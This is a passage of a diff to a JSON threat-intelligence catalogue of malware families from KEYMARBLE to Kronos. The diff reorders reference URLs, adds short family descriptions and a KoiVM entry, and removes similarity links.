+ "https://research.checkpoint.com/north-korea-turns-against-russian-targets/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "f7f53bb8-37ed-4bbe-9809-ca1594431536",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5",
"value": "KEYMARBLE"
},
@@ -28530,11 +30111,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.khonsari",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
- "https://www.cadosecurity.com/analysis-of-novel-khonsari-ransomware-deployed-by-the-log4shell-vulnerability/",
+ "https://cloudsek.com/technical-analysis-of-khonsari-ransomware-campaign-exploiting-the-log4shell-vulnerability/",
"https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation",
- "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://cloudsek.com/technical-analysis-of-khonsari-ransomware-campaign-exploiting-the-log4shell-vulnerability/"
+ "https://www.cadosecurity.com/analysis-of-novel-khonsari-ransomware-deployed-by-the-log4shell-vulnerability/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
+ "https://assets.virustotal.com/reports/2021trends.pdf"
],
"synonyms": [],
"type": []
@@ -28543,27 +30124,18 @@
"value": "Khonsari"
},
{
- "description": "",
+ "description": "According to Unit42, KHRAT is a Trojan that registers victims using their infected machine’s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat",
"https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/",
+ "https://unit42.paloaltonetworks.com/atoms/rancortaurus/",
"https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/",
- "https://www.forcepoint.com/de/blog/x-labs/trojanized-adobe-installer-used-install-dragonok-s-new-custom-backdoor",
- "https://unit42.paloaltonetworks.com/atoms/rancortaurus/"
+ "https://www.forcepoint.com/de/blog/x-labs/trojanized-adobe-installer-used-install-dragonok-s-new-custom-backdoor"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "72b702d9-43c3-40b9-b004-8d0671225fb8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "361d3f09-8bc8-4b5a-803f-8686cf346047",
"value": "KHRAT"
},
@@ -28595,19 +30167,18 @@
"value": "KillAV"
},
{
- "description": "",
+ "description": "KillDisk is a generic detection name used by ESET to refer to destructive malware with disk wiping capabilities, such as damaging boot sectors and overwriting then deleting (system) files, followed by a reboot to render the machine unusable. Although all KillDisk malware has similar functionality, as a generic detection, individual samples do not necessarily have strong code similarities or relationships. Such generic malware detections usually have many “sub-families”, distinguished by the detection suffix (e.g. KillDisk.NBO, KillDisk.NCV, and KillDisk.NCX). Sub-family variants that do have strong code similarities, are sometimes seen in separate cyberattacks and thus can help researchers make connections between them. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk",
- "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks",
+ "https://www.secureworks.com/research/threat-profiles/iron-viking",
"https://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt",
- "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/",
- "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
"https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks",
"https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://attack.mitre.org/groups/G0034",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/",
- "https://www.secureworks.com/research/threat-profiles/iron-viking"
+ "https://attack.mitre.org/groups/G0034"
],
"synonyms": [],
"type": []
@@ -28638,15 +30209,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "3160f772-d458-4bff-970c-1c0431238803",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "61edd17b-322d-45dc-a6a0-31c13ec2338e",
"value": "KimJongRat"
},
@@ -28655,19 +30217,22 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"https://metaswan.github.io/posts/Malware-Kimsuky-group's-resume-impersonation-malware",
- "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure",
+ "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html",
+ "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/",
"https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf",
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
+ "https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/",
+ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Kim.pdf",
"https://blog.prevailion.com/2019/09/autumn-aperture-report.html",
"https://asec.ahnlab.com/en/37396/",
- "https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/",
- "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/",
- "https://inquest.net/blog/2021/08/23/kimsuky-espionage-campaign",
- "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Kim.pdf",
"https://blog.alyac.co.kr/2347",
- "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html",
- "https://asec.ahnlab.com/en/30532/"
+ "https://asec.ahnlab.com/en/30532/",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9",
+ "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure",
+ "https://inquest.net/blog/2021/08/23/kimsuky-espionage-campaign",
+ "https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html"
],
"synonyms": [],
"type": []
@@ -28680,25 +30245,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kingminer",
- "https://news.sophos.com/en-us/2020/06/09/kingminer-report/",
- "https://asec.ahnlab.com/en/32572/",
"https://www.bitdefender.com/files/News/CaseStudies/study/354/Bitdefender-PR-Whitepaper-KingMiner-creat4610-en-EN-GenericUse.pdf",
- "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/",
"https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-labs-kingminer-botnet-report.pdf",
- "https://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html"
+ "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/",
+ "https://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html",
+ "https://news.sophos.com/en-us/2020/06/09/kingminer-report/",
+ "https://asec.ahnlab.com/en/32572/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "a9467439-48d8-4f68-9519-560bb6430f0c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "04d95343-fd44-471d-bfe7-908994a98ea7",
"value": "Kingminer"
},
@@ -28707,9 +30263,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kins",
- "https://github.com/nyx0/KINS",
- "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/",
"https://www.vkremez.com/2018/10/lets-learn-exploring-zeusvm-banking.html",
+ "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/",
+ "https://github.com/nyx0/KINS",
"https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/"
],
"synonyms": [
@@ -28727,8 +30283,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kivars",
"https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt"
],
"synonyms": [],
"type": []
@@ -28782,8 +30338,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd",
- "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://securitykitten.github.io/2016/11/28/the-klrd-keylogger.html"
+ "https://securitykitten.github.io/2016/11/28/the-klrd-keylogger.html",
+ "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks"
],
"synonyms": [],
"type": []
@@ -28805,38 +30361,42 @@
"value": "Knot"
},
{
- "description": "",
+ "description": "Koadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. Koadic has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic",
- "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf",
- "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf",
- "https://www.secureworks.com/research/threat-profiles/cobalt-ulster",
- "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
- "https://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://blog.tofile.dev/2020/11/28/koadic_jarm.html",
- "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
- "http://www.secureworks.com/research/threat-profiles/cobalt-ulster",
"https://github.com/zerosum0x0/koadic",
- "http://www.secureworks.com/research/threat-profiles/gold-drake",
+ "http://www.secureworks.com/research/threat-profiles/cobalt-ulster",
+ "https://www.secureworks.com/research/threat-profiles/gold-drake",
"https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
- "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf"
+ "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
+ "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf",
+ "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-ulster",
+ "http://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
+ "https://blog.tofile.dev/2020/11/28/koadic_jarm.html"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "f9e0b922-253c-40fa-a6d2-e60ec9c6980b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "3b5faa15-e87e-4aaf-b791-2c5e593793e6",
"value": "Koadic"
},
+ {
+ "description": "A loader written in .NET.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.koivm",
+ "https://labs.k7computing.com/index.php/koivm-loader-resurfaces-with-a-bang/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4b7c6af1-1980-452f-9405-e42d0066ff2d",
+ "value": "KoiVM"
+ },
{
"description": "",
"meta": {
@@ -28855,10 +30415,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo",
- "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf",
- "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx",
"https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
- "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2015-120808-5327-99"
+ "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx",
+ "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2015-120808-5327-99",
+ "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf"
],
"synonyms": [
"Splinter RAT"
@@ -28873,35 +30433,29 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.konni",
- "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
- "https://www.bleepingcomputer.com/news/security/hackers-take-over-diplomats-email-target-russian-deputy-minister/",
"https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/",
- "https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/",
- "https://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/",
- "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html",
"https://blog.alyac.co.kr/2474",
- "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html",
- "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant",
- "https://cluster25.io/wp-content/uploads/2022/01/Konni_targeting_Russian_diplomatic_sector.pdf",
- "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/",
- "https://blog.lumen.com/new-konni-campaign-targeting-russian-ministry-of-foreign-affairs/",
- "https://e.cyberint.com/hubfs/Cyberint_Konni%20Malware%202019%20Campaign_Report.pdf",
- "https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/",
+ "https://www.bleepingcomputer.com/news/security/hackers-take-over-diplomats-email-target-russian-deputy-minister/",
+ "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
"https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-227a"
+ "https://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/",
+ "https://cluster25.io/wp-content/uploads/2022/01/Konni_targeting_Russian_diplomatic_sector.pdf",
+ "https://blog.lumen.com/new-konni-campaign-targeting-russian-ministry-of-foreign-affairs/",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-227a",
+ "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html",
+ "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant",
+ "https://e.cyberint.com/hubfs/Cyberint_Konni%20Malware%202019%20Campaign_Report.pdf",
+ "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html",
+ "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/",
+ "https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html",
+ "https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/",
+ "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "24ee55e3-697f-482f-8fa8-d05999df40cd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "f982fa2d-f78f-4fe1-a86d-d10471a3ebcf",
"value": "Konni"
},
@@ -28923,26 +30477,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia",
- "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit",
- "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment",
- "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
- "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
- "https://unit42.paloaltonetworks.com/unit42-bisonal-malware-used-attacks-russia-south-korea/",
"https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/",
- "https://securitykitten.github.io/2014/11/25/curious-korlia.html",
- "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_3_takai_jp.pdf",
- "https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/",
- "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
- "https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html",
"https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/",
- "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2014-11-25-curious-korlia.md",
- "https://web.archive.org/web/20130920120931/https:/www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf",
- "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.93_ENG.pdf",
- "https://asec.ahnlab.com/1298",
- "https://www.secureworks.com/research/threat-profiles/bronze-huntley",
"https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
- "https://www.youtube.com/watch?v=_fstHQSK-kk"
+ "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
+ "https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-huntley",
+ "https://web.archive.org/web/20130920120931/https:/www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf",
+ "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
+ "https://securitykitten.github.io/2014/11/25/curious-korlia.html",
+ "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.93_ENG.pdf",
+ "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit",
+ "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2014-11-25-curious-korlia.md",
+ "https://www.youtube.com/watch?v=_fstHQSK-kk",
+ "https://asec.ahnlab.com/1298",
+ "https://unit42.paloaltonetworks.com/unit42-bisonal-malware-used-attacks-russia-south-korea/",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
+ "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_3_takai_jp.pdf",
+ "https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/"
],
"synonyms": [
"Bisonal"
@@ -28957,17 +30511,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://0xchrollo.github.io/articles/unpacking-kovter-malware/",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/",
- "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Kovter/Kovter.md",
- "https://www.symantec.com/connect/blogs/kovter-malware-learns-poweliks-persistent-fileless-registry-update",
- "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless",
"https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/",
"https://0x00sec.org/t/analyzing-modern-malware-techniques-part-1/18663",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless"
+ "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Kovter/Kovter.md",
+ "https://www.symantec.com/connect/blogs/kovter-malware-learns-poweliks-persistent-fileless-registry-update",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://0xchrollo.github.io/articles/unpacking-kovter-malware/",
+ "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a"
],
"synonyms": [],
"type": []
@@ -28980,19 +30534,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://isc.sans.edu/diary/26010",
- "https://news.drweb.com/show/?i=13242&lng=en",
- "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/",
- "https://isc.sans.edu/diary/25934",
- "https://blog.ensilo.com/game-of-trojans-dissecting-khalesi-infostealer-malware",
- "https://medium.com/s2wlab/deep-analysis-of-kpot-stealer-fb1d2be9c5dd",
"https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://medium.com/s2wlab/deep-analysis-of-kpot-stealer-fb1d2be9c5dd",
+ "https://isc.sans.edu/diary/26010",
+ "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/",
"https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/",
+ "https://isc.sans.edu/diary/25934",
"https://www.proofpoint.com/us/threat-insight/post/new-kpot-v20-stealer-brings-zero-persistence-and-memory-features-silently-steal",
+ "https://blog.ensilo.com/game-of-trojans-dissecting-khalesi-infostealer-malware",
"https://blag.nullteilerfrei.de/2020/04/26/use-ghidra-to-decrypt-strings-of-kpotstealer-malware/",
- "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md"
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://news.drweb.com/show/?i=13242&lng=en"
],
"synonyms": [
"Khalesi",
@@ -29021,10 +30575,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kraken",
+ "https://securingtomorrow.mcafee.com/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/",
"https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
- "https://www.recordedfuture.com/kraken-cryptor-ransomware/",
"https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-masquerading-as-superantispyware-security-program/",
- "https://securingtomorrow.mcafee.com/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/"
+ "https://www.recordedfuture.com/kraken-cryptor-ransomware/"
],
"synonyms": [],
"type": []
@@ -29033,13 +30587,14 @@
"value": "Kraken"
},
{
- "description": "",
+ "description": "ThreatPost describes KRBanker (Blackmoon) as a banking Trojan designed to steal user credentials from various South Korean banking institutions. It was discovered in early 2014 and since then has adopted a variety of infection and credential stealing techniques.\r\n\r\n",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker",
- "https://www.peppermalware.com/2019/03/analysis-of-blackmoon-banking-trojans.html",
- "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/",
"http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/",
+ "https://fidelissecurity.com/threatgeek/threat-intelligence/blackmoon-banking-trojan-new-framework/",
+ "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/",
+ "https://www.peppermalware.com/2019/03/analysis-of-blackmoon-banking-trojans.html",
"https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan"
],
"synonyms": [
@@ -29067,25 +30622,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos",
- "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
- "https://blog.morphisec.com/long-live-osiris-banking-trojan-targets-german-ip-addresses",
- "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/",
- "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/",
- "https://dissectingmalwa.re/osiris-the-god-of-afterlifeand-banking-malware.html",
- "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf",
- "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/",
- "https://www.zscaler.com/blogs/security-research/ares-malware-grandson-kronos-banking-trojan",
- "https://twitter.com/3xp0rtblog/status/1294157781415743488",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
- "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack",
- "https://intel471.com/blog/privateloader-malware",
- "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/",
"https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
+ "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack",
+ "https://dissectingmalwa.re/osiris-the-god-of-afterlifeand-banking-malware.html",
+ "https://intel471.com/blog/privateloader-malware",
"https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/",
+ "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
+ "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/",
+ "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/",
+ "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
+ "https://unit42.paloaltonetworks.com/banking-trojan-techniques/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn",
+ "https://www.zscaler.com/blogs/security-research/ares-malware-grandson-kronos-banking-trojan",
+ "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/",
"https://therecord.media/osiris-banking-trojan-shuts-down-as-new-ares-variant-emerges/",
- "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/",
+ "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf",
+ "https://blog.morphisec.com/long-live-osiris-banking-trojan-targets-german-ip-addresses",
